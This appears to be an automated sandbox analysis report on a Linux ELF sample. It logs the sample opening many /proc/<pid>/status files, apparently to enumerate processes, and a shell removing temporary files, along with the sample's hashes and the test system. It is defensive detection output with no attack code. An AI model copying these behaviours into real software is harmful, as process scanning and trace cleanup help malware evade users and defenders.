Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1477/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/774/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1476/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1872/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2048/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1475/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2289/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/777/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/658/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/936/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1639/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1638/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2208/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2180/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1809/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1494/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1890/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2063/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2062/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1888/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1886/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1489/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/785/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1642/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/788/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/789/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1648/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2078/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2077/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2074/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2195/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/793/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1656/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1654/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2226/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1532/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/796/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/797/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2069/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2102/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2223/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/799/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2080/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2242/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2084/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2083/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1668/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1664/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1389/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/720/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2114/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2235/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/721/status	Jump to behavior

Executes the "rm" command used to delete files or directories

Source: /usr/bin/dash (PID: 6307)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.fFD4gfLXFO /tmp/tmp.QPFGv5zNHi /tmp/tmp.4V1i9LBHGg			Jump to behavior
Source: /usr/bin/dash (PID: 6308)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.fFD4gfLXFO /tmp/tmp.QPFGv5zNHi /tmp/tmp.4V1i9LBHGg			Jump to behavior

ID:	1432506
Product:	CloudBasic
Start time:	11:27:15
Start date:	27.04.2024
Sample:	fwkeLXlthW.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	4e3269ecb73ec06315bb4649325006c9
SHA1:	1f6a25b2282f2acaed2f02b25eb5e3180f2232a9
SHA256:	aeeca28a10aed98529173178dacc8533fc21fc22f2f88fd3e5e073c97445f2d8
Filetype:	ELF Executable and Linkable format (Linux) (4029/14) 50.16%

Linux Analysis Report
fwkeLXlthW.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Linux Analysis Report fwkeLXlthW.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Linux Analysis Report
fwkeLXlthW.elf